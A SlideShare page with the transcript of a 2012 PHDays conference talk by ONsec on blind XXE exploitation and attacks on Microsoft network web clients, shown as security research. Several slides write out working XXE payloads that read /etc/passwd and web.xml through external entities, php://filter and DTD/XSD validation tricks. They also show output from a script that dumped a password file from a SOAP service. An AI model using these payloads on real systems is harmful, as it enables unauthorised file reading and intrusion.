ONsec PHDays 2012 XXE incapsulated report
Upcoming SlideShare
Loading in...5
×
 

ONsec PHDays 2012 XXE incapsulated report

on

  • 4,599 views

PHDays report. Attacks on MS clients and blind XXE exploitatio encapsulated report. D0znpp. ONsec

PHDays report. Attacks on MS clients and blind XXE exploitatio encapsulated report. D0znpp. ONsec

Statistics

Views

Total Views
4,599
Views on SlideShare
4,597
Embed Views
2

Actions

Likes
2
Downloads
55
Comments
0

2 Embeds 2

http://us-w1.rockmelt.com 1
http://www.docshut.com 1

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

ONsec PHDays 2012 XXE incapsulated report ONsec PHDays 2012 XXE incapsulated report Presentation Transcript

  • Attacks against Microsoftnetwork web clientsPHDays, Russia, Moscow, 31/05/2012
  • Author bio@d0znpp, d0znpp@onsec.ru•Have engaged in research in the field of webapplication security (since 2004);•Founder and security expert of ONseccompany (since 2009);•Now days: development of self-learningsystems for the detection of attacks on webapplications and heuristic analysis.
  • MS network under attack• Trusted domain• Same Origin Policy on trusted domain• Local network area• Security policy• Bypass “no-proxy for local addresses”• Profit
  • Blind XXE exploitationPHDays, Russia, Moscow, 31/05/2012
  • Good morning. Wake up, 0dayPostgreSQL all versions (8.4.11 debian4.4.5-8 tested)xmlparse(document ‘<!DOCTYPE c [ <!ENTITY a SYSTEM"http://172.28.202.20/">]><c>&a</c>);
  • Good morning. Wake up, 0dayPostgreSQL all versions (8.4.11 debian4.4.5-8 tested)No way to read content from entity, but…ERROR: invalid XML documentПОДРОБНО: http://172.28.202.20/:1: parser error : StartTag: invalid element name<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/x^http://172.28.202.20/:139: parser error : AttValue: " or expected <img src=http://seclog.ru/main/logo.php width=0 height=0/>
  • XXE basicsParser bug (feature)•To read local files•To make DoS (by reading /dev/zero loops)<?xml encoding=utf-8 ?><!DOCTYPE a [<!ENTITY e SYSTEM/etc/paswd> ]><a>&e;</a>
  • XXE applications• Local files• Internel network resources• Port scan (http://192.168.0.1:22/)• MS Windows network resources (adC$)• Wrappers (ldap:// in perl, expect:// ssh2:// etc.)
  • Classic XXE vuln• Based on web application error messages, such as:“Unknown language DATA”“Login DATA are not valid”“Password for user DATA does not match”• Could not provide reading of files with non- valid characters, such as 0x02 < > etc.
  • Vuln which won a “Month of Yandexbugs hunting“ contest$ ./xxe-direct.pl --file=“/etc/passwd”<?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"xmlns:namesp2="http://namespaces.soaplite.com/perl"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"xmlns:namesp84="http://xml.apache.org/xml-soap"xmlns:xsd="http://www.w3.org/2001/XMLSchema" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><SOAP-ENV:Fault><faultcode xsi:type="xsd:string">SOAP-ENV:511</faultcode><faultstring xsi:type="xsd:string">Unknownlanguage</faultstring><detail xsi:type="xsd:string">Unknown languageroot:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/sh
  • What is wrong?• Webapp may not display error messages• You may want to get XML file contents in Java Interesting XMLs: •web.xml •tomcat-users.xml •jetty.xml •http.conf (malformed)
  • PHP way to read anything• PHP wrapper provide a filter functionalphp://filter/convert.base64- encode/resource=web.xml• Then need to display an error messages too
  • What is blind?• Use DTD and XSD validations• Get a validation result (status or errors)• Use bruteforce, regexp, binary search and error message information (error-based) to read external XML structure and data
  • DTD based attack formulaXMLinp = DTDint + XMLint + XMLextV(XMLinp,DTDint)=V(XMLint,DTDint) && V(XMLext,DTDint)XMLinp – input XML streamDTDint – internal DTD schemaXMLint - internal XML structureXMLext – external XML (XML to read)V(xml,schema) – validation function, which returneda validation status (error message or boolean)
  • DTD based attack: from idea toschema <?xml version=“1.0” ?><?xml version=“1.0”?> <!ENTITY ext SYSTEM “web.xml”><secret> <!ELEMENT root (secret+)><any> <!ELEMENT secret (any+)>data <!ELEMENT any (#PCDATA)></any> XML validation error</secret> <root> &ext; <secret><any>data</any></secret> </root> Web.xml Input.xml
  • Example #1. Read attribute value<!ATTLIST key id (a|b) #REQUIRED ><key id=“secret”></key>Value "secret" for attribute id of mountain isnot among the enumerated set in //LibXMLAttribute "key" with value "secret" must havea value from the list "a b ". //Xerces
  • Example #2. Brute external XML tag<!ENTITY a SYSTEM "web.xml"><!ELEMENT ext(root+)>]><ext>&a;</ext> -- > OK<!ENTITY a SYSTEM "web.xml"><!ELEMENT ext(foobar+)>]><ext>&a;</ext> -- > Element ext content does not follow the DTD,expecting (root)+, got (CDATA ) //LibXML PHP
  • Example #3.Read external XML(Java)factory.setValidating(true);//SAXParserFactory orDocumentBuilderFactory<!DOCTYPE root [<!ELEMENT root (foo+)><!ENTITY a SYSTEM ’web.xml>]><root>&a;</root>Element type ”bar" must be declared.Where is “bar” tag? “Bar” in web.xml!
  • Problems of DTD based attacks• Example #3 doesn’t work in LibXML PHP ;(Only first tag name can be readed (Example #2) from DOM object in PHP (library’s bug).• DTD can’t be used to determine tag values (only tag names, document structure and attribute values)• Bruteforce required if errors are not displayed• Malformed XML such as http.conf can’t be readed
  • XSD based attack formulaXMLinp = DTDinp + XSDinp + XMLint + XMLextV(XMLinp,DTDinp,XSDinp) = V(XMLint,DTDinp,XSDinp) &&V(XMLext,DTDinp,XSDinp)XMLinp – input XML streamDTDinp – input DTD schemaXSDinp –input XSD schemaXMLint - internal XML structureXMLext – external XML (XML to read)V(xml,dtd,xsd) – validation function, which returned avalidation status (error message or boolean)
  • XSD based attack: from idea toschema <?xml version=“1.0” ?><?xml version=“1.0”?> <!ENTITY ext SYSTEM “web.xml”><secret> <root<any> xsi:noNamespaceSchemaLocation =data ”http://myhost/int.xsd”></any> XML validation error</secret> &ext; <secret><any>data</any></secret> </root> Web.xml Input.xml
  • Example #4. Read tag values (XSD)parser.setProperty("http://java.sun.com/xml/jaxp/properties/schemaLanguage","http://www.w3.org/2001/XMLSchema");//SAXParserFactory or DocumentBuilderFactory<!ENTITY ext SYSTEM “web.xml”><contactsxsi:noNamespaceSchemaLocation=”int.xsd”><xs:element name=”password" type="xs:int"/>cvc-datatype-valid.1.2.1: ’Secret is not a valid value for integer.cvc-type.3.1.3: The value ’Secret of element ’password is not valid.//Xerces
  • Binary search basics a-n? m-z? a-h? a-e? h-n?
  • Faster binary search• Phonetic chains• Probability with which one letter follows another one• Based of phonetics features of languages• Can be used to make text reading by binary search fasterhttp://exploit-db.com/papers/13969/
  • Example #5. Binary search for tagvalue (XSD)<xs:element name="password" type="PWD"/>…<xs:simpleType name=”PWD"> <xs:restriction base="xs:token"> <xs:pattern value=”[a-m]{1}[a-z]+"/> </xs:restriction></xs:simpleType>If first character of password tag value between “a”and “m” validation will true, else – false
  • And what about attacks withoutvalidation status?• Use something like time-based attacks!• XSD parser validate all tags even else some of them already not valid• Parser != Interpreter• What we can do in that case?
  • Example #6. 2blind attacks <xs:element name=”secret"> <xs:complexType> <xs:choice> <xs:group ref=”conditionGrp"/> <xs:group ref=”highloadGrp"/> </xs:choice> </xs:complexType> </xs:element> If value of secret tag approach to conditionGrp parser doesn’t execute regexp from highloadGrp. Then you should do highloadGrp regexp really difficult ;)
  • Problems of XSD based attacks• Internal XSD validation is rare in a wild• Only 4% of all webapps with XXE vulns make that*• Could not be used to read malformed XML, such as httpd.conf* By our stats from security audits since 2009
  • ???PHDays, Russia, Moscow,31/05/2012@d0znppd0znpp@onsec.ru